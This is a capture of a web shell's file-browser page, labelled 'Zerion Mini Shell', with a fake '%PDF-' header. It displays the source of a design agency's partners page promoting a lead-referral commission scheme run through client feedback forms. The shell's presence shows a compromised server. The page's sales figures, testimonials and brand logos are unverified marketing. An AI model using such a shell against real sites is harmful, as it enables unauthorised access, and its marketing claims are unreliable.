%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/home/eirtvhdf/www/about/
Upload File :
Create Path :
Current File : //proc/self/root/home/eirtvhdf/www/about/partners.php

<!DOCTYPE html>
<html lang="en">
<head>
  <title>EirTechs > Ranked#1 Design Company</title>
    <meta charset="utf-8">
    <meta name="description" content="Eirtechs is a worldwide tech agency specializing in user-centered design, strong client collaboration, digital marketing and unparalleled customer support. - 100% Satisfied Clients - Contact Us: 087-386-4833">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="keywords" content="Custom Logo Design, Custom Web Design, Mobile Applications, Software Development, Corporate Branding, Digital Marketing">
  <link rel="icon" href="<?php echo $serverName; ?>../assets/images/favicon.png" type="image/x-icon" />
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
  <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700|Great+Vibes" rel="stylesheet">
  <!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> -->
  <link rel="stylesheet" href="../assest/css/main.css">

  <!-- <meta http-equiv="refresh" content="1"> -->
  
  <style>
.accordion {
  background-color: #ffffff;
  color: #444;
  cursor: pointer;
  padding: 18px;
  width: 100%;
  border: none;
  text-align: left;
  outline: none;
  font-size: 15px;
  transition: 0.4s;
  border-bottom: 1px solid;
}

.active, .accordion:hover {
  background-color: #ccc;
}

.accordion:after {
  content: '\002B';
  color: #777;
  font-weight: bold;
  float: right;
  margin-left: 5px;
}

.active:after {
  content: "\2212";
}

.panel {
  padding: 0 18px;
  background-color: white;
  max-height: 0;
  overflow: hidden;
  transition: max-height 0.2s ease-out;
}

.card-body {
    height: 225px;
}
</style>

</head>
<body>
        <?php
require("../get.php");
?>

<header>
  <nav id="navbar" class="navbar customnav navbar-expand-md navbar-light p-0 dropshadow d-block">
        <!-- Toggler/collapsibe Button -->
        <div class="m-0 row m-0">
          <button class="navbar-toggler ml-3 my-1 p-1 px-2" type="button" data-toggle="collapse" data-target="#collapsibleNavbar">
            <span class="navbar-toggler-icon"></span>
          </button>
          <!-- Brand -->
          <a class="p-0 pl-3 col" href="../index.php">
            <img src="../assest/image/logo.png" class="navbar-brand" alt="">
          </a>
          
          <ul class="collapse navbar-collapse navbar-nav second_nav justify-content-end" id="collapsibleNavbar">
            <li class="nav-item">
              <a href="../index.php" class="nav-link">Home</a>
            </li>
         <!--   <li class="nav-item dropdown">
              <a href="#!" class="nav-link">Services</a>
              <div class="dropdown-menu dropshadow">
                  <a class="dropdown-item" href="<?php echo $serverName; ?>../service/corporate-branding/logo_design.php">Logo Design</a>
                <a class="dropdown-item" href="../service/mobile_application.php">Mobile Application</a>
                <a class="dropdown-item" href="../service/software_development.php">Software Development</a>
                <a class="dropdown-item" href="../service/web&cms_development.php">Web & CMS Development</a>
                <a class="dropdown-item" href="../service/corporate_branding.php">Corporate Branding</a>
                <a class="dropdown-item" href="../service/digital_marketing.php">Digital Marketing</a>
                <div class="dropdown-divider"></div>
              </div>
            </li> -->
            <li class="nav-item dropdown">
              <a href="#!" class="nav-link">Expertise</a>
              <div class="dropdown-menu dropshadow">
                <a class="dropdown-item" href="../expertise/strategy.php">Strategy</a>
                <a class="dropdown-item" href="../expertise/design.php">Design</a>
                <a class="dropdown-item" href="../expertise/development.php">Development</a>
                <a class="dropdown-item" href="../expertise/marketing.php">Marketing</a>
                <a class="dropdown-item" href="../expertise/post_launch.php">Post-Launch</a>
                <div class="dropdown-divider"></div>
              </div>
            </li>
          <!--  <li class="nav-item dropdown">
              <a href="#!" class="nav-link">About</a>
              <div class="dropdown-menu dropshadow">
                <a class="dropdown-item" href="../about/the_company.php">The Company</a>
                <a class="dropdown-item" href="../about/our_team.php">Our Team</a>
                <a class="dropdown-item" href="../about/clients.php">Clients</a>
                <a class="dropdown-item" href="../about/testimonials.php">Testimonials</a>
                <div class="dropdown-divider"></div>
              </div>
            </li> -->
            <li class="nav-item">
              <a class="nav-link" href="../about/the_company.php">The Company</a>
            </li>
             <li class="nav-item">
              <a class="nav-link" href="../about/our_team.php">Our Team</a>
            </li>
             <li class="nav-item">
              <a class="nav-link" href="../about/clients.php">Clients</a>
            </li>
            
            <li class="nav-item"><a href="<?php echo $serverName; ?>about/partners.php" class="nav-link">Partners - Joint Venture</a></li>
            <li class="nav-item cta">  <a target="_blank" href="https://crm.eirtechs.com/" class="nav-link"><span>Login</span></a> </li>
            <!-- <li class="nav-item">
              <a class="nav-link" href="../contact.php">Contact</a>
            </li> -->
          </ul>
          
          <!-- <div class="d-sm-flex align-self-center d-none contact_text mr-3">
            <a href="https://EirfoTech.ie/contact.php" class="text-light"> Contact Us</a> &nbsp; <i class="d-lg-block d-none mx-1">|</i><span class="d-none d-lg-block"> &nbsp; <i class="fa fa-phone mt-2"></i>&nbsp;&nbsp;Call Us +353 (87) 386-4833</span>
          </div> -->
          <div class="p-0 justify-content-end d-flex float-right">
            <button class="primary-r-gradient nav-reqbtn float-right">Request Info</button>
          </div>
        </div>
    </nav>
    
    <div class="banner">
      <img src="../assest/image/slider/a2.jpg" class="bg-danger" alt="" width="100%">
      <div class="banner-caption">
        <h3>Respecting & believing is our key to success</h3>
      </div>
    </div>
</header>
<div class=" primary-r-gradient2">
<div class="container justify-content-center d-flex py-3">
  <div class="col-lg-9 col-12 text-center">
    <h1 class="pt-4 text-center text-white" style="font-size: 50px; font-weight: bold; font-family: cursive;">Our <i style="font-family: none;font-weight: normal; color: rgba(255,255,255,0.5);"></i><span class="text-secondary">successful joint venture </span>with SMEs companies</h1>
    <p style="font-size: 18px; color: white;">Over the past 3 years we  had a successful joint venture with SMEs companies. Through our Joint ventures, we were able to get cumulative sales of $6.5M. Last year alone we had a total commission paid out of $875k, this year we plan to cross the million mark in paying out commission. We are now extending this business venture to freelancers too, since <most freelancers, you> have worked with many clients, a reputation with the clients is built. We leverage this reputation together with our sales force and cutting edge technologies, we are able to make further deals with those clients that no other company is capable of. Yes that's right! We are proud to say that we have such systems and teams in place that are able to take up any challenge and make it a reality. <br><br>In the last 15 months alone we were able to expand our reach to 12 different countries. With the headquarters located in Dublin Ireland, and regional offices located in USA, Canada, UK, Australia, Sweden, France, and South Africa, Philippines, and India just to name a few. By the end of 2022 our aim is to be the global industry leader in Joint Ventures and business partnership programs with SMEs companies.</p>
  </div>
</div>
</div>


<div class="row m-0 p-0">
  <div class="col-12 col-md-6 m-0 p-3 p-lg-5 p-md-4">
    <div class="col">
      <h1 style="font-size: 50px; font-weight: bold; color: black;">Process<i style="font-family: none;font-weight: normal; color: grey;"></i><span class="text-primary"></span></h1>
      <p style="font-size: 18px; color: black;">Our process is plain and simple, you have clients to whom you are offering particular services, hence you have a connection with your clients. Our plan to further sell other services to your clients. Sell them those services which you are not selling so that we are not competing with you, but rather giving you extra money with minimal effort from your side. 
<br><br>
Ok that's fine, but what exactly do I need to do? 
<br><br>
Great question, Ok so we will provide you with a link to a feedback questionnaire (click here to see sample feedback questionnaire) which you will share with your past, current and future clients. The feedback questionnaire is basically a questionnaire in which you request your client to give you feedback on your recent work which you have done for them. This questionnaire will also ask your clients if they are interested in any other services which we provide. If they say yes, then they will provide their contact number and we are in business. Our professional sales team will contact this lead and make a sale. For every sale that we make you will receive commission. It's a win-win situation for both parties with minimal effort from your side.</p>
    </div>
  </div>
  <div class="col-12 col-md-6 m-0 p-0">
    <img style="object-fit: cover; width: 100%; height: 100%;" src="../assest/image/card5.jpg" alt="">
  </div>

</div>

    <div class="strip2 primary-r-gradient">
        <div class="container p-4">
            <div class="row justify-content-center">
            <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><p><span>Ready to work together?</span></p></div>
            <div class="col-lg-3 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><button class="text-primary dropshadow">Request Info</button></div>
            <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><img src="assets/images/phone_icon.svg" alt=""><a style="color:white" href="javascript:void(0)" onclick="window.location='tel:+1 (650) 447-2271'" class="external"><p><b><u>+1 (650) 447-2271</u></b></a><br>Call Us Anytime</p></div>
            </div>
        </div>
    </div>

<div class="secondary-r-gradient">
  <div class="container">

    <div id="customer_review" class="carousel slide carousel-multi-item p-3" data-ride="carousel">
      <h1 class="text-light text-center mt-5"><b>See What Our Clients Say About Us</b></h1>

<section class="text-center my-5 p-1">

  <!-- Grid row -->
  <div class="row">

    <!--Grid column-->
    <div class="col-lg-4 col-md-12 mb-lg-0 mb-4">
      <!--Card-->
      <div class="card testimonial-card">
        <!--Background color-->
        <div class="card-up info-color"></div>
        <!--Avatar-->
        <div class="avatar mx-auto white">
          <img style="margin-top: 20px !important; max-width: 50% !important;" src="https://mdbootstrap.com/img/Photos/Avatars/img%20(9).jpg" class="rounded-circle img-fluid">
        </div>
        <div class="card-body">
          <!--Name-->
          <h4 class="font-weight-bold mb-4">Ross lynch</h4>
          <hr>
          <!--Quotation-->
          <p class="dark-grey-text mt-4"><i class="fas fa-quote-left pr-2"></i>Easy to deal, simple and staring forwarded joint venture program, get paid swiftly.</br></p>
        </div>
      </div>
      <!--Card-->
    </div>
    <!--Grid column-->

    <!--Grid column-->
    <div class="col-lg-4 col-md-6 mb-md-0 mb-4">
      <!--Card-->
      <div class="card testimonial-card">
        <!--Background color-->
        <div class="card-up blue-gradient">
        </div>
        <!--Avatar-->
        <div class="avatar mx-auto white">
          <img style="margin-top: 20px !important; max-width: 50% !important;" src="https://mdbootstrap.com/img/Photos/Avatars/img%20(20).jpg" class="rounded-circle img-fluid">
        </div>
        <div class="card-body">
          <!--Name-->
          <h4 class="font-weight-bold mb-4">Katie Johnsons</h4>
          <hr>
          <!--Quotation-->
          <p class="dark-grey-text mt-4"><i class="fas fa-quote-left pr-2"></i>I am loving it, just made $600 on my first month by referring my existing clients over.</br></p>
        </div>
      </div>
      <!--Card-->
    </div>
    <!--Grid column-->

    <!--Grid column-->
    <div class="col-lg-4 col-md-6">
      <!--Card-->
      <div class="card testimonial-card">
        <!--Background color-->
        <div class="card-up indigo"></div>
        <!--Avatar-->
        <div class="avatar mx-auto white">
          <img style="margin-top: 20px !important; max-width: 50% !important;" src="https://mdbootstrap.com/img/Photos/Avatars/img%20(10).jpg" class="rounded-circle img-fluid">
        </div>
        <div class="card-body">
          <!--Name-->
          <h4 class="font-weight-bold mb-4">Maria Kate</h4>
          <hr>
          <!--Quotation-->
          <p class="dark-grey-text mt-4"><i class="fas fa-quote-left pr-2"></i>They simply do what they say, there is no fuss or complexity and they want us to succeed. I am on my third project and look forward to many more.</p>
        </div>
      </div>
      <!--Card-->
    </div>
    <!--Grid column-->

  </div>
  <!-- Grid row -->

</section>
<!-- Section: Testimonials v.1 -->

      <div class="controls-top justify-content-end d-flex">
        <a class="btn-floating" href="#customer_review" data-slide="prev"><i class="fa fa-chevron-left"></i></a>
        <a class="btn-floating" href="#customer_review" data-slide="next"><i class="fa fa-chevron-right"></i></a>
      </div>


    </div>



  </div>
</div>







<div class="row m-0 blog_career">
  
  <div class="col-12 col-md-6 career">
    <img src="../assest/image/laptop-working-activity-adult.jpg" alt="">
    <!--<span>#EirfoTechCares</span><br><br>-->
    <!--<button class="btn secondary-r-gradient text-light">LEARN MORE</button>-->
  </div>
  
  <div class="col-12 col-md-6 blog">
    <img src="../assest/image/connected customer.jpg" alt="">
    <h3>Use Case</h3>
    <P>We have had success with 80+ SMEs. Below is one example of a company called logotech based in India, they have partnered with us and this is what they have to say.</P>
    
    <p style="font-size: 14px;">“We are a logo design agency based in India. We Partnered with Eirtechs about 6 months ago, ever since we have partnered, we increased our revenue by additional 35% because of the easy commission we get from Eirtechs. It's pretty simple if you ask me. We design logos, borchers banners etc. once we deliver the logo to our international client, we send that client a link to a feedback form which is provided by Eirtechs. The client gives us a review and feedback on the recent work, this feedback form also asks the client if they are interested in other services such as SEO, social media marketing, content writing etc.. Most of the time the client will show interest in one of the services which Eirtechs are providing. That's all we do from my side. We just share a feedback questionnaire link with the client and Eirtechs takes care of the rest. Our average commission is between $900 - $1,200 depending on how many of our clients show interest, we get commission for every sale Eirtechs make through our leads which are generated through the feedback form.”</p>
    <!--<button class="btn secondary-r-gradient text-light">READ OUR BLOGS</button>-->
    <span>Sunil Kumar</span>
    
  </div>
  
</div>

<div class="strip2 primary-r-gradient">
        <div class="container p-4">
            <div class="row justify-content-center">
            <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><p><span>Ready to work together?</span></p></div>
            <div class="col-lg-3 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><button class="text-primary dropshadow">Request Info</button></div>
            <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><img src="assets/images/phone_icon.svg" alt=""><a style="color:white" href="javascript:void(0)" onclick="window.location='tel:+1 (650) 447-2271'" class="external"><p><b><u>+1 (650) 447-2271</u></b></a><br>Call Us Anytime</p></div>
            </div>
        </div>
    </div>
    
    
 




<div class="cardpanel3">
  <div class="container p-5 justify-content-center">
    <h1 class="text-primary text-center mb-3"><b><i style="font-family: none;font-weight: normal; color: grey;">FAQs </i><span style="color: black"></span></b></h1>
    <!-- <p class="text-center" style="font-size: 18px;"></p> -->
    <div class="row justify-content-center">
<button class="accordion">How are the clients' records tracked?</button>
<div class="panel">
  <p>We will give you access to the google form responses so that you can also see which client has responded and what service they have shown interest. More importantly you will also be given access to our CRM, in which you will be able to see the clients details, any sales and projects that are being worked on. You will also be able to see the summary of every client and the amount of sale we have charged every client that was generated through your leads.</p>
</div>

<button class="accordion">How is my commission calculated?</button>
<div class="panel">
  <p>Your commission will be 10% of the sale we charge. 
For eg. We made a sale of $2,000, because that client came through you, we will give you 10% of $2,000, which is $200.
</p>
</div>

<button class="accordion">What If I am offering the same service as Eirtechs?</button>
<div class="panel">
  <p>We will not compete with you on the services that you are already offering you clients,
That is why we have asked you which services you offer. If you wish to amend the questionnaire then let us know and we will remove any services which you do not want us to offer to your clients.
</p>
</div> 

<button class="accordion">What makes Eirtechs different from others?</button>
<div class="panel">
  <p>We are industry experts in making sales and living up to customers expectations, we are an international based company with more than 12 branches worldwide. We invite our clients to our office if need be. For eg. If a client is located in London then we make face to face deal with that client since we have an office there.</p>
</div>

<button class="accordion">What if there is no sale through my leads?</button>
<div class="panel">
  <p>That's not a problem, our procedure is transparent and you are able to see the progress and status of every lead which you provide through CRM. Our stats show that for every 5 leads we generate a sale, so if not that end of the world, simply forward us more leads. More leads means more properties for sale and higher chance of success. </p>
</div>

<button class="accordion">Is there an extra bonus if I do exceptionally well?</button>
<div class="panel">
  <p>Yes, we have a Partner of the month incentive for which you will receive bonus and extra commission. We also make special custom deals for consistent partners..</p>
</div>

<button class="accordion">What If I directly refer a lead to you for a service that you provide or can I outsource a project to you?</button>
<div class="panel">
  <p>Yes you are more than welcome to do so, our sales team will contact the lead and make the sale in the same way that they do with the leads generated from the feedback questionnaire form.</p>
</div>

<button class="accordion">Can I refer other businesses or individuals to you to partner with and what do I get?</button>
<div class="panel">
  <p>Yes you can refer other businesses and individuals, if they meet our criteria for joint venture program then we will take them on board. For every sale that we make through them you will also receive 3%-5% commission depending on the quality of lead.</p>
</div>

<button class="accordion">How will I receive payment?</button>
<div class="panel">
  <p>There are several methods to get paid. We mainly payout our partners via Paypal, Stripe, Bitcoin, Bank Transfer. If there are any specific payment methods you prefer, kindly let us know and we might be able to cater for your specific needs depending on your country. 
We will disperse your commission on the 5th of every month. The minimum threshold for payout needs to be greater than $50. Once your commission is greater than $50 then will pay you on the 5th day of the next month.
</p>
</div>
    </div>  
  </div>
</div>



<!--
<div class="strip2 primary-r-gradient">
  <div class="container p-4">
    <div class="row justify-content-center">
      <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><p><span>Ready to</span> <br>discuss your project?</p></div>
      <div class="col-lg-3 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><button class="text-primary dropshadow">Request Info</button></div>
      <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><img src="../assest/image/phone_icon.svg" alt=""><a style="color:white" href="javascript:void(0)" onclick="window.location='tel:0873864833'" class="external"><p><b><u>087-386-4833</u></b></a><br>Call Us Anytime</p></div>
    </div>
  </div>
</div> -->
<div class="bg-light">
<div class="container company_logo">
  <div class="row p-5">
    <div class="col-12 col-md-6 p-5 text-center align-self-center left_side">
      <h1><b style="color:#4a419e;">Loved</b> & <b style="color:#73226e;">Trusted</b></h1>
      <h2>by the industry leaders</h2>
    </div>
    <div class="col-12 col-md-6 right_side">
      <div class="row justify-content-center custom_row">
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/California Department of Insurance Logo.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/FIG.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/boxing.png"></div>
      </div>
      <div class="row justify-content-center custom_row">
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/GG.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/JVC.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/LG.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Michael_Kors_(brand)_logo.svg.png"></div>
      </div>
      <div class="row justify-content-center custom_row">
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Qatar-Airways.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Suzuki.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Walmart-logo.png"></div>
      </div>
    </div>

  </div>
</div>
</div>


<?php require("../inc/footer2.php"); ?>
  <section class="req_form justify-content-center">
<div class="position-absolute h-100 w-100 closebtn"></div>
<div class="strip1 secondary-r-gradient col-lg-4 col-md-6 col-sm-10 col-12 p-0 align-self-center">
  <h2 class="col-12">Let's build <b>somthing great</b> together! <i class="fa fa-times closebtn"></i></h2>
  <div class="container p-4">
    <form method="post" class="form-row justify-content-end align-self-center">
      <div class="form-group col-12">
        <input type="text" name="name" class="form-control my_input" placeholder="Name *" required>
      </div>
      <div class="form-group col-12">
        <input type="email" name="email" class="form-control my_input" placeholder="Email *" required>
      </div>
      <div class="form-group col-12">
        <div class="input-group">
          <select id="" name="code" class="custom-select col-4">
                      <option selected><?php echo $ipdat->geoplugin_countryCode.' ('.$ipdat2.')'; ?></option>
                      <option data-countryCode="DZ" value="DZ (+213)">DZ (+213)</option>

                		<option data-countryCode="AR" value="AR (+54)">AR (+54)</option>
                	
                		<option data-countryCode="AU" value="AU (+61)">AU (+61)</option>
                		<option data-countryCode="AT" value="AT (+43)">AT (+43)</option>
                		<option data-countryCode="AZ" value="AZ (+994)">AZ (+994)</option>
                	
                		<option data-countryCode="BD" value="BD (+880)">BD (+880)</option>
                		
                		<option data-countryCode="BE" value="BE (+32)">BE (+32)</option>
                		
                		<option data-countryCode="BR" value="BR (+55)">BR (+55)</option>
                		
                		<option data-countryCode="CA" value="CA (+1)">CA (+1)</option>
                	
                		<option data-countryCode="CN" value="CN (+86)">CN (+86)</option>
                	
                		<option data-countryCode="EG" value="EG (+20)">EG (+20)</option>
                	
                		<option data-countryCode="FJ" value="FJ (+679)">FJ (+679)</option>
                		<option data-countryCode="FI" value="FI (+358)">FI (+358)</option>
                		<option data-countryCode="FR" value="FR (+33)">FR (+33)</option>
                		
                		<option data-countryCode="DE" value="DE (+49)">DE (+49)</option>
                		
                		<option data-countryCode="GR" value="GR (+30)">GR (+30)</option>
                		<option data-countryCode="GL" value="GL (+299)">GL (+299)</option>
                	
                		<option data-countryCode="HK" value="HK (+852)">HK (+852)</option>
                		<option data-countryCode="PK" value="PK (+92)">PK (+92)</option>
                		
                		<option data-countryCode="IS" value="IS (+354)">IS (+354)</option>
                		<option data-countryCode="IN" value="IN (+91)">IN (+91)</option>
                		<option data-countryCode="ID" value="ID (+62)">ID (+62)</option>
                		<option data-countryCode="IR" value="IR (+98)">IR (+98)</option>
                		<option data-countryCode="IQ" value="IQ (+964)">IQ (+964)</option>
                		<option data-countryCode="IE" value="IE (+353)">IE (+353)</option>
                		
                		<option data-countryCode="JP" value="JP (+81)">JP (+81)</option>
                	
                		<option data-countryCode="KW" value="KW (+965)">KW (+965)</option>
                	
                		<option data-countryCode="MY" value="MY (+60)">MY (+60)</option>
                		<option data-countryCode="MV" value="MV (+960)">MV (+960)</option>
                		
                		<option data-countryCode="MX" value="MX (+52)">MX (+52)</option>
                	
                		<option data-countryCode="NP" value="NP (+977)">NP (+977)</option>
                		<option data-countryCode="NL" value="NL (+31)">NL (+31)</option>
                		
                		<option data-countryCode="NG" value="NG (+234)">NG (+234)</option>
                		
                		<option data-countryCode="NO" value="NO (+47)">NO (+47)</option>
                		<option data-countryCode="OM" value="OM (+968)">OM (+968)</option>
                	
                		<option data-countryCode="PL" value="PL (+48)">PL (+48)</option>
                		<option data-countryCode="PT" value="PT (+351)">PT (+351)</option>
                		
                		<option data-countryCode="QA" value="QA (+974)">QA (+974)</option>
                	
                		<option data-countryCode="RU" value="RU (+7)">RU (+7)</option>
                	
                		<option data-countryCode="SA" value="SA (+966)">SA (+966)</option>
                	
                		<option data-countryCode="SG" value="SG (+65)">SG (+65)</option>
                	
                		<option data-countryCode="ZA" value="ZA (+27)">ZA (+27)</option>
                		<option data-countryCode="ES" value="ES (+34)">ES (+34)</option>
                		<option data-countryCode="LK" value="LK (+94)">LK (+94)</option>
                	
                		<option data-countryCode="SE" value="SE (+46)">SE (+46)</option>
                		<option data-countryCode="CH" value="CH (+41)">CH (+41)</option>
                	
                		<option data-countryCode="TH" value="TH (+66)">TH (+66)</option>
                		
                		<option data-countryCode="TR" value="TR (+90)">TR (+90)</option>
                	
                		<option data-countryCode="AE" value="AE (+971)">AE (+971)</option>
                		
                		 <option data-countryCode="US" value="US (+1)">US (+1)</option>
                
                	
                		<option data-countryCode="ZW" value="ZW (+263)">ZW (+263)</option>
                    </select>
          <input type="number" name="phone" class="form-control my_input col-9" placeholder="Phone Number" required>
        </div>
      </div>
      <div class="form-group col-12">
        <textarea name="message" id="" class="form-control my_input" placeholder="Message and suitable time for call *" required></textarea>
      </div>
      
      <div class="form-group col-12">
              <input type="hidden" id="token" name="token">
                </div>
      
      <div class="form-group my_input">
        <button type="submit" name="submit" class="form-control text-primary">Submit</button>
      </div>
    </form>
  </div>
</div>
</section>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"></script>

<script src="../assest/javascript/main.js"></script>

<script>
var acc = document.getElementsByClassName("accordion");
var i;

for (i = 0; i < acc.length; i++) {
  acc[i].addEventListener("click", function() {
    this.classList.toggle("active");
    var panel = this.nextElementSibling;
    if (panel.style.maxHeight) {
      panel.style.maxHeight = null;
    } else {
      panel.style.maxHeight = panel.scrollHeight + "px";
    } 
  });
}
</script>
</body>
</html>

Zerion Mini Shell 1.0